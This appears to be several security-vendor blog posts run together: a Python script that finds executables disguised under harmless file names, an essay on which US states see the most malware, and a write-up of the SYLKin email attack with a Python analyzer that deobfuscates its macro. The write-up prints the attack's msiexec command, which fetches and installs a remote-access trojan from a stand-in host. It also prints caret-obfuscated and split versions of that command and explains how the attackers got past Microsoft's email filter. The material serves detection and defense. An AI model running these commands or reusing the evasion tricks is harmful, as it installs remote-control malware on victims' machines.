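"""Find PE images hiding under non-executable names in a temp directory (added example)."""
import os
import struct
import tempfile
from pathlib import Path

# Extensions under which a PE image is expected; anything else is reported.
EXEC_EXTS = {".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl", ".drv", ".mui"}


def is_pe_file(path):
    """True if the file has a DOS 'MZ' header whose e_lfanew points at a 'PE\\0\\0' signature."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(0x40)
            if len(head) < 0x40 or head[:2] != b"MZ":
                return False
            (e_lfanew,) = struct.unpack_from("<I", head, 0x3C)
            fh.seek(e_lfanew)
            return fh.read(4) == b"PE\x00\x00"
    except OSError:
        return False


def find_disguised_executables(root):
    """Return sorted paths under `root` that are PE images but lack an executable extension."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            if p.suffix.lower() not in EXEC_EXTS and is_pe_file(p):
                hits.append(str(p))
    return sorted(hits)


def minimal_pe_bytes():
    """Constructed: the smallest byte layout is_pe_file accepts (a header, not a runnable binary)."""
    img = bytearray(b"MZ" + b"\x00" * 0x3E)       # 0x40-byte DOS header, e_lfanew field at 0x3C
    struct.pack_into("<I", img, 0x3C, 0x40)       # NT headers start right after the DOS header
    img += b"PE\x00\x00" + b"\x00" * 20           # PE signature + empty COFF file header
    return bytes(img)


def build_sample_tempdir():
    """Constructed stand-in for %temp%: one benign .tmp, one PE hiding as .tmp, one text file."""
    d = tempfile.mkdtemp(prefix="triage_")
    (Path(d) / "host_info.tmp").write_bytes(b"ip=198.51.100.7\r\nhistory=...\r\n")  # constructed
    (Path(d) / "nsz9A3.tmp").write_bytes(minimal_pe_bytes())                       # hypothetical name
    (Path(d) / "readme.txt").write_bytes(b"plain text")
    return d


if __name__ == "__main__":
    root = os.environ.get("TEMP") or build_sample_tempdir()
    for hit in find_disguised_executables(root):
        print("PE image with non-executable name:", hit)
```

The check keys on file content rather than extension because the extension is exactly what the dropper controls; pair it with the GAV signature below rather than treating it as a replacement.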

We urge our users to only use official and reputable websites as their source of software programs. Always be vigilant and cautious when installing software applications particularly if you are not certain of the source.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Chindo.AB_4 (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

What’s the Malware Capital of the US?

A lot of the dangers in the U.S. follow logical and predictable patterns. If you want to avoid tornadoes, you shouldn’t live in Oklahoma, Kansas or Nebraska. If you’re worried about hurricanes and earthquakes, you should avoid the East Coast and West Coast, respectively.

And while dangers such as traffic accidents and property crime are more dynamic and complex, these issues are studied at length, with data released periodically on what areas have shown increases and decreases. In short, it’s easy to find out what sorts of dangers one might encounter in a given area in order to prepare accordingly.

While the damage from cybercrime isn’t as immediately visible as the damage from things like drought and flood, it still has the potential to be extremely devastating and costly. According to the FBI, cybercrime cost individuals and businesses a staggering $3.5 billion in 2019 alone.

To help organizations better assess their risks, SonicWall Capture Labs threat researchers continually monitor cybercrime and release the data collected in reports, such as the recently released mid-year update to the 2020 SonicWall Cyber Threat Report.

The threat research gathered during the first half of 2020 offers insight into not only what modes of attack criminals are using, but also what areas they’re targeting. While no city or state has a monopoly on (or immunity from) malware, there were some notable hotspots. From January to June, researchers identified 304.1 million malware attacks in California — more than 100 million more than in the next-highest state (New York).

So that means businesses in California see a lot more malware, right? Not so fast. According to the Census Bureau’s Survey of Entrepreneurs, firms with fewer than 500 employees accounted for 99.7% of employer firms in the U.S. — and California has by far the largest number of such businesses (791,268 out of 6.4 million total for the entire U.S.).

Simply put, there’s a similarly massive number of endpoints, networks and sensors. In terms of states where any given person is most likely to encounter malware, California is actually tenth … from the bottom.

We call this phenomenon “malware spread.” Knowing the total malware is useful — it allows us to compare year-over-year trends for a given area. But it doesn’t tell us much about the odds a particular person will encounter malware. For that, we need to calculate the malware spread, or the percentage of sensors in an area that saw a malware attack. The greater the malware spread percentage, the more widespread malware is in a given region.

It can be useful to think of malware totals vs. malware spread in terms of how we think about rain. Knowing the total rainfall for a defined area is useful, but it doesn’t tell us whether we’re likely to need an umbrella. For that, we need the Probability of Precipitation, or “chance of rain.” Like the malware spread percentage, this calculation takes into account a number of other factors to provide a more meaningful risk assessment.

To find the state with the highest malware spread, you’ll need to travel 1,523 miles east, to Kansas. Nearly a third of organizations there, or 31.3%, saw malware. (For comparison’s sake, fewer than a quarter of those in California — 24.1% — did.) Moreover, there’s a significantly higher risk of malware in Kansas than in the second-riskiest state, Montana. The percentage decrease between Kansas and Montana is greater than the percentage decrease between Montana and the ninth-riskiest state (Louisiana).

Using the same data set, we can also determine the least-risky states for malware. Here, North Dakota takes top honors — only 21.9% of organizations here saw malware. Georgia, Texas, Maine, New York, Arizona, Missouri, Alaska, Minnesota and California rounded out the list of top 10 safest states in terms of malware.

It’s tempting to try and find commonalities among the riskiest and least risky states, but it’s not likely to yield much more than frustration. For example, the list of riskiest states includes states in the heartland, but also Hawaii — the most coastal state there is. Three of the top five most populous states are on the “least risky” list, but so is Alaska, which is No. 48 — and Florida, the third-most populous, appears on the “riskiest” list. Similarly, each list includes both northern states and southern states, hot states and cold states, red states and blue states. The state malware rankings don’t even line up with the rankings for ransomware risk.

At first glance, this randomness might suggest there are no lessons that can be taken from this data. On the contrary: That is exactly the lesson. There is no “cybercrime capital.” There are no safe harbors. Anyone can be targeted by cybercrime, but the good news is that, with proper safeguards, compromise can be prevented.

Protect Against SYLKin Attack with SonicWall Cloud App Security

With the definition of normal changing with each passing day, the ongoing pandemic has forced security professionals to re-evaluate new working models and how they can prevent attackers from targeting end users. Albert Einstein once said, “In the midst of every crisis lies great opportunity,” and this idea has formed the basis for how cybercriminals operate in the era of COVID-19.

Never ones to let an opportunity go to waste, cybercriminals are deploying new attacks each day. One of them, a new SYLKin attack, bypasses both Microsoft 365 default security (EOP) and Microsoft advanced security (ATP). At the time of writing, Microsoft 365 is still vulnerable, and the attack is still being used extensively against Microsoft 365 customers.

Lately, Avanan’s security analysts have detected a significant increase in the use of SLK files in attacks against Microsoft 365 customers. In these attacks, the attackers send an email with a .slk attachment containing a malicious macro that runs an msiexec command to download and install a remote access trojan.

It is a very sophisticated attack with several obfuscation methods specifically designed to bypass Microsoft 365. Gmail customers, on the other hand, are safe from this attack: Google already blocks it on incoming email and has made it impossible to send these SLK files as attachments from a Gmail account.

What is SYLKin attack?

SLK files are rare, so if you have received one in your inbox, chances are you are being targeted by the most recent remote access trojan campaign, which has been ‘upgraded’ to bypass Microsoft ATP. The attack method itself has been extensively documented, so I’ll only explain it briefly. The focus will be on how such a well-understood attack bypassed Office 365 filters, including Microsoft ATP.

The attack specifically targets Microsoft 365 accounts and until recently, was isolated to a small number of organizations.

Emails are targeted and manually created

The attack emails are highly customized, using information and language that could only have been found and written manually. The messages seem to come from a partner or customer using a topic that is highly specific to the organization and the individual. For example, an email to a manufacturer will discuss parts specifications, an email to a tech firm will ask for changes to a large electronics order, or an email to a government department will discuss legal concerns. The subjects, contents and even the attached files are customized with the target’s name and organization. No two are alike. What they have in common is that the messages are realistic and compelling enough to convince a user to click on the attached SLK file.

What is a SLK file?

A so-called “Symbolic Link” (SLK) file is Microsoft’s human-readable, text-based spreadsheet format, which saw its last update around 1986. At a time when XLS files were proprietary, SLK was an open-format alternative, before XLSX was introduced in 2007. To the end user, a SLK file looks like an Excel document, but for an attacker it’s an easy way to bypass Microsoft 365 security, even for accounts protected with Microsoft ATP.

What does this attack do?

A recent version of the SYLK attack includes an SLK file with an obfuscated macro designed to run a command on a Windows machine:

msiexec /i http://malicious-site.com/install.php /q

This runs Windows Installer (msiexec) in quiet mode (/q) to install whatever MSI package the attackers host at that URL. In this campaign, it’s a hacked version of the off-the-shelf NetSupport remote-control application, granting the attacker full control over the desktop.

Windows grants more trust to SLK files than XLSX files

Because Office’s “Protected View” is not applied to SLK files downloaded from the Internet or received as email attachments, Excel does not open them in read-only mode.

When opening an SLK file, the end user does not see the Protected View banner that Excel shows for an XLSX file from the same source.

Targeted methodology to bypass Microsoft Advanced Threat Protection

The first versions of the SLK attack method were seen in 2018 and were eventually blocked by Microsoft ATP. This new campaign, however, includes a number of obfuscation techniques specifically designed to bypass Microsoft ATP.

  • The attack was sent from hundreds of free Hotmail accounts.
  • The macro script includes ‘^’ characters to confuse ATP filters.
  • The URL was split in two so that ATP would not read it as a web link.
  • The hosting server became active only after the email was sent, so it seemed benign if sandboxed by ATP.
  • The hosting server only responded to “Windows Installer” user agents, ignoring other queries.

These methods are ATP-specific. Again, Gmail blocks these files and, in fact, makes it impossible to send them from a Gmail account.

The attackers took advantage of a series of blind spots in the Microsoft email infrastructure to send this attack from thousands of disposable Hotmail accounts, with addresses in the format “randomwords1982@hotmail.com,” each sending just a handful of messages at a time.

An important benefit of Hotmail to many attackers is that the same security filters are being used end to end. If the attacker is able to attach and send a file, it is likely that it will make it through the entire Microsoft security infrastructure. Should one of the accounts get flagged, Microsoft will disable it, informing the attacker that his messages are getting caught downstream.

While most of the well-known anonymous email-sending engines deserve their poor spam and phishing reputations, Hotmail users benefit from Microsoft’s own reputation. Since the service was merged into Outlook.com, Microsoft seems to grant its senders a higher level of trust than external senders.

The macro script includes escape characters to confuse ATP filters

The attackers take advantage of the fact that ATP filters do not interpret text in the same way as the Windows command line. ATP would normally be able to identify the powerful and potentially malicious msiexec command, but the attackers inserted command-line escape characters ‘^’ to obfuscate the script.

msiexec /i http://malicious-site.com/install.php /q

becomes

M^s^ie^xec /ih^tt^p^:^/^/malicious-site.com/install.php ^/q

When read by Advanced Threat Protection filters, the msiexec command becomes unreadable and the telltale ‘http://’ is obscured.

When read by the desktop command line, the escape characters ‘disappear,’ running as if they were never there. This is just a command-line version of the Zero-Font methodologies that have plagued ATP for years.

The URL was split into two macros so that ATP would not read it as a link

ATP does not need to see the ‘http://’ prefix to recognize a web link; it would normally catch any text of the form ‘malicious-site.com.’ To hide the link, the attackers split it across two separate commands.

The first macro command creates a batch file with the first half of the URL.

Set /p=””M^s^ie^xec /ih^tt^p^:^/^/malicious-sit”” > JbfoT.bat

The second macro command adds the remainder of the URL and then runs the batch file.

Set /p=””e.com/install.php ^/q”” >> JbfoT.bat & JbfoT.bat

Within seconds, the malicious SLK file has run two simple commands to create a malicious install script and begin installing whatever software the attackers decide to host.
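The following is an added example (not code from the original post or from Avanan/SonicWall) that does for an analyst what the static filter described above fails to do: it pulls the EXEC() cells out of an .slk file, replays the two ‘Set /p’ writes into the batch file, strips the cmd.exe carets the way the interpreter does and reports the msiexec command and URL that actually run. SAMPLE_SLK is constructed: it wraps the two fragments quoted above in EXEC() cells, and the ‘cmd /c’ prefix and Auto_Open name are assumptions about the macro layout, not a reproduction of the real attachment. The SYLK record layout the parser relies on (type;field;field..., ‘C’ cell records with an ‘E’ expression field, ‘;;’ for a literal ‘;’) is the public format. cmd.exe quoting is emulated only as far as this sample needs: the text written to the batch file is what sits between the quotes of ‘Set /p="..."’.

```python
"""Recover the command hidden in a split, caret-obfuscated SYLK macro (added example)."""
import re

# Constructed sample .slk: the two fragments from the write-up wrapped in EXEC() cells.
SAMPLE_SLK = "\r\n".join([
    "ID;PWXL;N;E",
    "NN;NAuto_Open;ER1C1;KO",                       # assumed: run the macro at R1C1 on open
    'C;X1;Y1;EEXEC("cmd /c Set /p=""M^s^ie^xec /ih^tt^p^:^/^/malicious-sit"" > JbfoT.bat")',
    'C;X1;Y2;EEXEC("cmd /c Set /p=""e.com/install.php ^/q"" >> JbfoT.bat & JbfoT.bat")',
    "C;X1;Y3;EHALT()",
    "E",
])

FIELD_SPLIT = re.compile(r"(?<!;);(?!;)")                       # ';' that is not part of ';;'
EXEC_CALL = re.compile(r'EXEC\("(.*)"\)\s*$', re.I | re.S)
SET_P_WRITE = re.compile(r'set\s+/p\s*=\s*"([^"]*)"\s*(>>?)\s*([^\s&|]+)', re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)


def slk_records(text):
    """Yield (record_type, fields) for each SYLK record, unescaping ';;' to ';'."""
    for line in text.splitlines():
        if line:
            rtype, *fields = FIELD_SPLIT.split(line)
            yield rtype, [f.replace(";;", ";") for f in fields]


def exec_commands(slk_text):
    """Return the command line inside every EXEC("...") cell, with Excel's "" unescaped to "."""
    cmds = []
    for rtype, fields in slk_records(slk_text):
        if rtype != "C":
            continue
        for field in fields:
            m = EXEC_CALL.match(field[1:]) if field.startswith("E") else None
            if m:
                cmds.append(m.group(1).replace('""', '"'))
    return cmds


def cmd_unescape(line):
    """Drop cmd.exe '^' escapes outside double quotes, as the interpreter does when running the line."""
    out, quoted, i = [], False, 0
    while i < len(line):
        ch = line[i]
        if ch == '"':
            quoted = not quoted
        elif ch == "^" and not quoted:
            i += 1
            if i >= len(line):
                break                                            # trailing caret: nothing to escape
            ch = line[i]
        out.append(ch)
        i += 1
    return "".join(out)


def rebuild_dropped_files(cmds):
    """Replay 'Set /p="text" > file' and '>> file' writes in order; return {file: contents}."""
    files = {}
    for cmd in cmds:
        for text, redirect, name in SET_P_WRITE.findall(cmd):
            files[name] = (files.get(name, "") if redirect == ">>" else "") + text
    return files


def naive_url_scan(cmds):
    """What a per-cell static filter sees: URLs in each raw fragment on its own (none here)."""
    return [u for cmd in cmds for u in URL_RE.findall(cmd)]


def analyze_slk(slk_text):
    """Join the fragments, strip the carets and report what the dropped batch file really runs."""
    cmds = exec_commands(slk_text)
    findings = []
    for name, content in rebuild_dropped_files(cmds).items():
        command = cmd_unescape(content)
        findings.append({
            "file": name,
            "command": command,
            "urls": URL_RE.findall(command),
            "executed": any(re.search(r"&\s*" + re.escape(name) + r"\b", c, re.I) for c in cmds),
            "msiexec_remote_install": bool(re.search(r"\bmsiexec\b.*\s/i", command, re.I))
                                      and bool(URL_RE.search(command)),
        })
    return findings


if __name__ == "__main__":
    print("per-fragment URL scan:", naive_url_scan(exec_commands(SAMPLE_SLK)))
    for finding in analyze_slk(SAMPLE_SLK):
        print(finding)
```

The contrast between naive_url_scan (empty) and analyze_slk (a remote msiexec install) is the whole bypass: a filter that scores each cell’s text in isolation never sees ‘http://’ or ‘msiexec’, while replaying the writes and the caret stripping the shell performs makes both obvious.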

The hosting server was armed after the message was sent

We don’t believe Microsoft ATP is testing these files within their sandbox environment, relying instead on static filters. But we have found that other vendors have also failed to catch this attack, even when the code is executed in a virtual environment.

There is no special code or intelligence within the script to detect whether it is running under emulation. Instead, the attackers do not enable the malicious web server until shortly after the email is sent. Because the sandbox cannot reach the server, the script fails and installs nothing.

In addition to enabling the URL only after delivery, the server would become inactive a few hours later, rejecting further queries. This seems to be a way to avoid action from their provider, as the reported content is no longer available at the links associated with the attack by the time a manual take-down notice is requested.

The coordinated timing of the hosting servers with the sending of the emails is characteristic of a more sophisticated campaign. When combined with the high-profile nature of the targeted organizations, it suggests an APT group or state actor.

The hosting server only responded to requests from “Windows Installer” agents

In addition to their on-and-off timing, the hosting servers utilized another common technique to avoid analysis, rejecting all queries except for those with User Agent: Windows Installer. This ensured that it only responded to the malicious script and would avoid detection by URL analysis tools.

How did it evade Microsoft protection?

Each of the obfuscation methodologies was designed to bypass a specific layer of the Microsoft 365 security infrastructure. While we understand how each was used in turn, we are still confused as to how ATP fails to detect this technique in emulation. Creating a batch file and calling the msiexec application is considered malicious, even if it fails to run. We must assume, then, that none of these files are being tested by the sandbox layer. Unfortunately, because each file is unique, no two attachments share the same MD5 hash, so each file has to be given additional scrutiny.

Got SonicWall CAS protecting your inbox? Don’t worry, we have you protected.

If you have SonicWall Cloud App Security protecting your organization’s inbox and you are running in Protect (Inline) mode, this attack is blocked, and users will not see these attacks in their inbox. (If you are in Monitor Mode, we recommend that you move to Protect (Inline) mode.)

Alternatively, we recommend you configure your Office 365 account to reject files of this type. SLK files are relatively rare, so unless you have a legacy reason to allow them, we recommend excluding the SLK extension as a static mail-flow rule, at least until Microsoft fixes this gap.

Microsoft’s recommendations are much more complicated but are another alternative to protect the desktop.